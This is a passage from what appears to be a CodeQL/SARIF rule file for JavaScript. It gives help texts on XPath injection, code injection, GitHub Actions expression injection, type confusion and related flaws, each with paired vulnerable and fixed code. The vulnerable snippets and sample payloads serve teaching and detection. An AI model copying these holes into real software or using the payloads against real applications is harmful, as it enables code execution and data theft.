[xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n", + "markdown" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-643" ], + "description" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/xpath-injection", + "kind" : "path-problem", + "name" : "XPath injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/case-sensitive-middleware-path", + "name" : "js/case-sensitive-middleware-path", + "shortDescription" : { + "text" : "Case-sensitive middleware path" + }, + "fullDescription" : { + "text" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n", + "markdown" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-178" ], + "description" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths.", + "id" : "js/case-sensitive-middleware-path", + "kind" : "problem", + "name" : "Case-sensitive middleware path", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.3" + } + }, { + "id" : "js/code-injection", + "name" : "js/code-injection", + "shortDescription" : { + "text" : "Code injection" + }, + "fullDescription" : { + "text" : "Interpreting unsanitized user input as code allows a malicious user arbitrary code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-095", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Interpreting unsanitized user input as code allows a malicious user arbitrary\n code execution.", + "id" : "js/code-injection", + "kind" : "path-problem", + "name" : "Code injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/unsafe-dynamic-method-access", + "name" : "js/unsafe-dynamic-method-access", + "shortDescription" : { + "text" : "Unsafe dynamic method access" + }, + "fullDescription" : { + "text" : "Invoking user-controlled methods on certain objects can lead to remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094" ], + "description" : "Invoking user-controlled methods on certain objects can lead to remote code execution.", + "id" : "js/unsafe-dynamic-method-access", + "kind" : "path-problem", + "name" : "Unsafe dynamic method access", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/actions/command-injection", + "name" : "js/actions/command-injection", + "shortDescription" : { + "text" : "Expression injection in Actions" + }, + "fullDescription" : { + "text" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious user to inject code into the GitHub action." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "actions", "security", "external/cwe/cwe-094" ], + "description" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious\n user to inject code into the GitHub action.", + "id" : "js/actions/command-injection", + "kind" : "problem", + "name" : "Expression injection in Actions", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.3" + } + }, { + "id" : "js/bad-code-sanitization", + "name" : "js/bad-code-sanitization", + "shortDescription" : { + "text" : "Improper code sanitization" + }, + "fullDescription" : { + "text" : "Escaping code as HTML does not provide protection against code injection." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Escaping code as HTML does not provide protection against code injection.", + "id" : "js/bad-code-sanitization", + "kind" : "path-problem", + "name" : "Improper code sanitization", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/type-confusion-through-parameter-tampering", + "name" : "js/type-confusion-through-parameter-tampering", + "shortDescription" : { + "text" : "Type confusion through parameter tampering" + }, + "fullDescription" : { + "text" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n", + "markdown" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-843" ], + "description" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type.", + "id" : "js/type-confusion-through-parameter-tampering", + "kind" : "path-problem", + "name" : "Type confusion through parameter tampering", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/unsafe-deserialization", + "name" : "js/unsafe-deserialization", + "shortDescription" : { + "text" : "Deserialization of user-controlled data" + }, + "fullDescription" : { + "text" : "Deserializing user-controlled data may allow attackers to execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, 